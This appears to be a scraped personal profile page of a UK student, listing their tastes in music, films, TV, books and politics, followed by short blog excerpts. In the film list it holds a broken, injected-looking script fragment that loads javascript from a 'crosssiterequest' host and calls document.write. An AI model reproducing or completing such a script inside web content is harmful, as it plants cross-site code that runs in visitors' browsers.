My Interests

LIKES: Music (stress on it being GOOD music). Politics. Shouting at the tv. Complaining about the world and everything. My hair. It's very important to me. Buying clothes. Finding free clothes in my mothers wardrobe. Making jewlery. Did I mention my hair... DISLIKES: THE DAILY MAIL. Woodey Allen. John Prescott. Margaret Thatcher. Tony Blair. George Bush. George W. Bush. Westlife. Starbucks. The Kaiser Chiefs and The Bravery. I really can't stand either of these bands to the point that hearing them being played in a club makes me want to drown my sorrows. Maybe THAT'S why I get drunk...ITV. Hollyoaks. Eastenders. Celebrity programmes. Posh Spice (that women really isn't pretty). And I cannot physically stand anyone, ANYONE, who wears Che Guevara merchandise. I mean SERIOUSLY. It is so ludicrous I can't even begin to talk about it without becoming enraged by people's hypocrisy and down right stupidity. Like when Che died combatting capitalism his dying wish was to have his face plastered on t-shirts and clocks and sold in River Island to chavs to wear along with bling bling diamante watches, or to students to wear alongside their converse and instantly become 'a student.'Aaaaaaaaaaaaaaaaaaaaargh!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!! Nestle, GSK and for personal reasons, First Great Western.

I'd like to meet:

Jon Snow. He is my hero. I love him and his ties. Watching Channel 4 news makes my day and watching him interview Tony Blair is top notch entertainment.Steve Lowe and Alan Mcarther, the guys who wrote 'Is it just me or is everything shit?' They are my soul mates. Absolute legends. If anyone reads and knows them, please pass on the message.Had she not recently passed, Mo Mowlam, for obvious reasons. God rest her soul. Without her and Robin, is there any hope left?!Steve Jones. Nuff said.

Music:

Well. Where do I start? Indie, rock and pop from The Doors and Hendrix to Jeff Buckley and The Libertines. Dylan, The Beatles, The Stones, Janis Joplin, The Beach Boys, The Kinks, Cream, Zeppelin, obviously. The Clash, Ramones, Oasis, The Stone Roses, Greenday, White Stripes, Idlewild, The Strokes, Bloc Party, The Zutons, Coldplay, Arctic Monkeys. Ryan Adams. Fiona Apple, Regina Spektor, Camille. I love jazz and blues. Robert Johnson, Howlin' Wolf, Woody Guthrie, John Lee Hooker. Stan Getz, Miles Davies to John Coltrane, Ella, Nina. At the same time, nothing beats old school funk and a bit of Sly and the Family Stone. Jurassic 5 are absolute legends who I love and adore. However I would never consider myself a hiphop girlie. At the moment, it's all about Young Knives, Hot Club de Paris and Camille who I've been listening too incessently on my old school cd player. Who needs an ipod when you can carry around a massive piece of plastic?UNSIGNED MUSIC YOU MUST LISTEN TO:The: Hair, Cajun Dance Party, Metro Riots, The Counterfeits, The Screening, The Heys, Computer Club, Seven Days Till Sunday, Angel Iles & Morris, and so many more but I can't bothered to spend all day writing this...

Movies:

Well, to list in no particular order: Goodfellas, Blow, Pulp Fiction, American Beauty, The Shawshank Redemption, Apocolypse Now, Godfathers 1 & 2, American History X, Silence of the Lambs, The Jungle Book, High Fidelity, Ferris Bueller's Day Off, Dazed and Confused, Dogma, Garden State, City of God, L'Auberge Espagnole, Les Poupees Russes, La Haine, Casablanca, Quadrophenia, Almost Famous, Walk The Line and lots more that I can't think of right now....... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("..1...{}");}..

Television:

That 70s Show, The Mighty Boosh, CSI (only Vegas), Scrubs, The Office, Friends, Blackadder, The OC, Channel 4 News, Spaced, Neighbours, Popworld, Sopranos.

Books:

Jane Austen to Naomi Klein. I love Orwell to Dickens. Must also admit to being a Harry Potter fan. White Teeth by Zadie Smith, Londonstani by Gautam Malkani. One of the best books I've read was 'Wild Swans' by Jung Chang which everyone should read. Also get a copy of 'Is It Just Me Or Is Everything Shit.' Seriously, they are my soulmates. But it must also be said how much I hate Proust. Proust is shit. Its not big. Its not clever. Anyone who says they like him is lying cause they think it will make them sound intelligent. I don't care about his stupid madeleines. Yes, memories, we have them, schema theory, we got it.

Heroes:

I already told you, Jon Snow. Oh, and Debbie Harry...

My Blog

Shocking discovery

Right. Now I've been listening to some new CDs, as you do when slightly hungover on a Saturday afternoon and engineering works on the Central line dictate that you are unable to spend your wages in To...

Feminism...you know you love it!

Right, I couldn't be bothered to write an entirely new blog, so I've put up my article as it explains far better my feelings on feminism. Also, I've just finished reading Fukuyama's journal on why wo...

Well. I've just been doing some research for my dissertation comparing British Multiculturalism to French 'Integration' (laugh-a-minute, I know) and whilst looking at institutional racism in both...

pink lady

I just did my laundry, which were whites, lovely. Got my big floopy skirt in for if it gets warm, got my fair trade t-shirt in there too, all nice and jazzy. After pissing about, watching neighbours,...

I'm in the library and the 'o' button doesn't work properly on this computer. It's annoying after only one sentence. I spent a half hour writing a blog yesterday for Felix who was complaining about my...

Came back to Bath. Thought it would be awesome. Thought it would be cheap. At second party by 11:30. Left for the Abbey. Slipt on wet steps. Fell flat on face. Spent 20 quid on hospital cab fare. Now ...
